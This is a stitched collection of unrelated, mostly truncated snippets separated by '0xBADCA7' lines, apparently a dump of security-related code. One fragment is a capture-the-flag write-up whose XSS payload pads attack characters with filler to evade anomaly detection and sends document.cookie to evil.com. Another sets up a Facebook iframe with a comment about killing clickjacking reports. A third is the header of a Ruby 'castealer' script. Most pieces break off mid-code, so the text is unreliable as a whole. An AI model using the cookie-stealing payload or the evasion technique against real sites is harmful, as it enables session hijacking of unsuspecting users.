0xBADCA7

/* package whatever; // don't place package name! */

import java.util.*;
import java.lang.*;
import java.io.*;

/* Name of the class has to be "Main" only if the class is public. */
class Ideone
{
    private static long multiplier = 0x5DEECE66DL;

0xBADCA7

In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.

We didn't have to figure out exactly how the anomaly detection worked, but as soon as we understood that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):

anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>

0xBADCA7

#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser

class RequestHandler(BaseHTTPRequestHandler):
    
    def do_GET(self):

0xBADCA7

// this is for the iframe to facebook.com
document.domain = 'facebook.com'
 
uid = 501558012;
app_id = 123456789012332;
function Image(){
   // this should kill the click jacking report
}
 
// create a new iframe we will use to load facebook.com

0xBADCA7

# Original castealer.rb with analysis
#####################################################################################
 
require 'rubygems' #redundant
require 'openssl'
require 'digest/md5' #redundant
 
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) #redundant
ctx = OpenSSL::SSL::SSLContext.new #redundant

0xBADCA7

<html lang="en">
 <head>
  <script>

function str2hex(str)
{ 
  var out_str = " ";
  
	for(var i = 0; i < str.length; i++)
	{	

0xBADCA7

Bringing back an old Github "feature" (bug) that can easily set any Github user up

Intro

It all started when I was browsing sources of one of the apps in our organization on Github. I must say I love browsing code on Github - syntax highlight, line comments, swift loading, a lot of goodness, etc. However, one file listing left me profoundly distracted and confused... The code was mine according to GH but I knew for sure it looks nothing like my code. Just that small patch left me pondering for a while as I was sure it just can't be my code, so I started digging it all up to the surface.

First of all, I didn't see any suspicious activity on my profile page. Nothing off in the Git history as well. The commit bore my name and email. It was a while ago - back when we were not signing our commits (nowadays we certainly do!) within the organization.

Old "feature"

Then I realized that Github will surely allow any email and name go through once set up via git config user.name and `git config user.e

0xBADCA7

##
## WPS on OpenWRT
##  This script enables Wi-Fi Protected Setup on OpenWRT.
##
##  Resources
##      http://wiki.openwrt.org/doc/uci/wireless#wps.options
##      

#Install the full wpad package
opkg update

0xBADCA7

define xac
    dont-repeat
    set $addr = (char *)($arg0)
    set $endaddr = $addr + $arg1
    while $addr < $endaddr
        printf "%p: ", $addr
        set $lineendaddr = $addr + 8
        if $lineendaddr > $endaddr
            set $lineendaddr = $endaddr
        end

0xBADCA7

#!/usr/bin/env python3

from http.server import HTTPServer,SimpleHTTPRequestHandler
from socketserver import BaseServer
import ssl

httpd = HTTPServer(('localhost', 1443), SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='certificate.pem', keyfile='privatekey.pem', server_side=True)
httpd.serve_forever()